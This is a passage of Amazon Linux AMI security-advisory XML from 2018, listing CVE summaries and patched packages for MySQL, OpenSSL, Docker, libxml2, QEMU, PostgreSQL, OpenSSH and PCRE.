Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: MyISAM). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1602356:
CVE-2018-3058 mysql: MyISAM unspecified vulnerability (CPU Jul 2018)
CVE-2018-3056:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).
1602355:
CVE-2018-3056 mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2018)
CVE-2018-3054:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1602354:
CVE-2018-3054 mysql: Server: DDL unspecified vulnerability (CPU Jul 2018)
CVE-2018-2767:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Encryption). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N).
1564965:
CVE-2018-2767 mysql: use of SSL/TLS not enforced in libmysqld (Return of BACKRONYM)
CVE-2018-0739:
Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe. Fixed in OpenSSL 1.1.0h (Affected 1.1.0-1.1.0g). Fixed in OpenSSL 1.0.2o (Affected 1.0.2b-1.0.2n).
1561266:
CVE-2018-0739 openssl: Handling of crafted recursive ASN.1 structures can cause a stack overflow and resulting denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739" title="" id="CVE-2018-0739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2767" title="" id="CVE-2018-2767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3054" title="" id="CVE-2018-3054" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3056" title="" id="CVE-2018-3056" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3058" title="" id="CVE-2018-3058" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3060" title="" id="CVE-2018-3060" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3061" title="" id="CVE-2018-3061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3062" title="" id="CVE-2018-3062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3064" title="" id="CVE-2018-3064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3065" title="" id="CVE-2018-3065" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3066" title="" id="CVE-2018-3066" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3070" title="" id="CVE-2018-3070" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3071" title="" id="CVE-2018-3071" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3077" title="" id="CVE-2018-3077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3081" title="" id="CVE-2018-3081" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-server" version="5.7.23" release="2.8.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql57-server-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.23" release="2.8.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.23-2.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1071</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1071: medium priority package update for docker</title><issued date="2018-09-05 19:30:00" /><updated date="2018-09-06 22:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10892:
The default OCI Linux spec in oci/defaults{_linux}.go in Docker/Moby, from 1.11 to current, does not block /proc/acpi pathnames. The flaw allows an attacker to modify host&#039;s hardware like enabling/disabling Bluetooth or turning up/down keyboard brightness.
1598581:
CVE-2018-10892 docker: container breakout without selinux in enforcing mode
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10892" title="" id="CVE-2018-10892" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="18.06.1ce" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-18.06.1ce-2.16.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="18.06.1ce" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-18.06.1ce-2.16.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1072</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1072: medium priority package update for libxml2</title><issued date="2018-09-05 19:31:00" /><updated date="2018-09-06 22:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14404:
A null pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 when parsing an invalid XPath expression. Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable to a denial of service attack due to a crash of the application.
1595985:
CVE-2018-14404 libxml2: NULL pointer dereference in xpath.c:xmlXPathCompOpEval() can allow attackers to cause a denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14404" title="" id="CVE-2018-14404" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-static" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.3.52.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.3.52.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.3.52.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.3.52.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.3.52.amzn1.x86_64.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.3.52.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.3.52.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.3.52.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.3.52.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.3.52.amzn1.i686.rpm</filename></package><package 
name="libxml2-python26" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.3.52.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.3.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1073</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1073: important priority package update for qemu-kvm</title><issued date="2018-09-05 19:33:00" /><updated date="2018-09-06 22:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7550:
Quick Emulator (QEMU), compiled with the PC System Emulator with multiboot feature support, is vulnerable to an OOB r/w memory access issue. The issue could occur while loading a kernel image during the guest boot, if mh_load_end_addr address is greater than the mh_bss_end_addr address. A user or process could use this flaw to potentially achieve arbitrary code execution on a host.
1549798:
CVE-2018-7550 QEMU: i386: multiboot OOB access while loading kernel image
CVE-2018-11806:
A heap buffer overflow issue was found in the way the SLiRP networking back-end in QEMU processes fragmented packets. It could occur while reassembling the fragmented datagrams of an incoming packet. A privileged user/process inside a guest could use this flaw to crash the QEMU process resulting in DoS or potentially leverage it to execute arbitrary code on the host with the privileges of the QEMU process.
1586245:
CVE-2018-11806 QEMU: slirp: heap buffer overflow while reassembling fragmented datagrams
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11806" title="" id="CVE-2018-11806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7550" title="" id="CVE-2018-7550" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm-common" version="1.5.3" release="156.15.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.15.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.15.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.15.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm" version="1.5.3" release="156.15.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.15.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.15.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.15.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.15.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.15.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1074</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1074: important priority package update for postgresql96</title><issued date="2018-09-05 20:39:00" /><updated date="2018-09-06 22:02:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10925:
It was discovered that PostgreSQL failed to properly check authorization on certain statements involved with &quot;INSERT ... ON CONFLICT DO UPDATE&quot;. An attacker with &quot;CREATE TABLE&quot; privileges could exploit this to read arbitrary bytes of server memory. If the attacker also had certain &quot;INSERT&quot; and limited &quot;UPDATE&quot; privileges to a particular table, they could exploit this to update other columns in the same table.
1612619:
CVE-2018-10925 postgresql: Missing authorization and memory disclosure in INSERT ... ON CONFLICT DO UPDATE statements
CVE-2018-10915:
A vulnerability was found in libpq, the default PostgreSQL client library where libpq failed to properly reset its internal state between connections. If an affected version of libpq were used with &quot;host&quot; or &quot;hostaddr&quot; connection parameters from untrusted input, attackers could bypass client-side connection security features, obtain access to higher privileged connections or potentially cause other impact through SQL injection, by causing the PQescape() functions to malfunction.
1609891:
CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10915" title="" id="CVE-2018-10915" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10925" title="" id="CVE-2018-10925" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96-plpython26" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.10" release="1.81.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql96-libs-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-test" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" 
version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.10-1.81.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1075</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1075: low priority package update for openssh</title><issued date="2018-09-05 20:41:00" /><updated date="2018-09-06 22:02:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-15473:
OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
1619063:
CVE-2018-15473 openssh: User enumeration via malformed packets in authentication requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15473" title="" id="CVE-2018-15473" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-keycat" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.16.71.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-16.71.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-16.71.amzn1.i686.rpm</filename></package><package 
name="openssh-keycat" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-16.71.amzn1.i686.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-16.71.amzn1.i686.rpm</filename></package><package name="openssh" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-16.71.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.16.71.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.16.71.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-16.71.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-16.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1076</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1076: important priority package update for pcre</title><issued date="2018-09-05 20:42:00" /><updated date="2023-10-25 21:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3191:
The compile_branch function in pcre_compile.c in PCRE 8.x before 8.39 and pcre2_compile.c in PCRE2 before 10.22 mishandles patterns containing an (*ACCEPT) substring in conjunction with nested parentheses, which allows remote attackers to execute arbitrary code or cause a denial of service (stack-based buffer overflow) via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror, aka ZDI-CAN-3542.
CVE-2015-8391:
The pcre_compile function in pcre_compile.c in PCRE before 8.38 mishandles certain [: nesting, which allows remote attackers to cause a denial of service (CPU consumption) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8391" title="" id="CVE-2015-8391" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3191" title="" id="CVE-2016-3191" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pcre" version="8.21" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-8.21-7.8.amzn1.x86_64.rpm</filename></package><package name="pcre-tools" version="8.21" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-tools-8.21-7.8.amzn1.x86_64.rpm</filename></package><package name="pcre-debuginfo" version="8.21" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-debuginfo-8.21-7.8.amzn1.x86_64.rpm</filename></package><package name="pcre-devel" version="8.21" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-devel-8.21-7.8.amzn1.x86_64.rpm</filename></package><package name="pcre-static" version="8.21" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-static-8.21-7.8.amzn1.x86_64.rpm</filename></package><package name="pcre-static" version="8.21" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-static-8.21-7.8.amzn1.i686.rpm</filename></package><package name="pcre-debuginfo" version="8.21" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-debuginfo-8.21-7.8.amzn1.i686.rpm</filename></package><package name="pcre-tools" version="8.21" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-tools-8.21-7.8.amzn1.i686.rpm</filename></package><package name="pcre-devel" version="8.21" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-devel-8.21-7.8.amzn1.i686.rpm</filename></package><package name="pcre" version="8.21" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-8.21-7.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1079</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1079: important priority package update for postgresql93 postgresql94 postgresql95</title><issued date="2018-09-19 17:04:00" /><updated date="2018-09-19 23:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10925:
It was discovered that PostgreSQL failed to properly check authorization on certain statements involved with &quot;INSERT ... ON CONFLICT DO UPDATE&quot;. An attacker with &quot;CREATE TABLE&quot; privileges could exploit this to read arbitrary bytes of server memory. If the attacker also had certain &quot;INSERT&quot; and limited &quot;UPDATE&quot; privileges on a particular table, they could exploit this to update other columns in the same table.
1612619:
CVE-2018-10925 postgresql: Missing authorization and memory disclosure in INSERT ... ON CONFLICT DO UPDATE statements
CVE-2018-10915:
A vulnerability was found in libpq, the default PostgreSQL client library, where libpq failed to properly reset its internal state between connections. If an affected version of libpq were used with &quot;host&quot; or &quot;hostaddr&quot; connection parameters from untrusted input, attackers could bypass client-side connection security features, obtain access to higher-privileged connections or potentially cause other impact through SQL injection, by causing the PQescape() functions to malfunction.
1609891:
CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
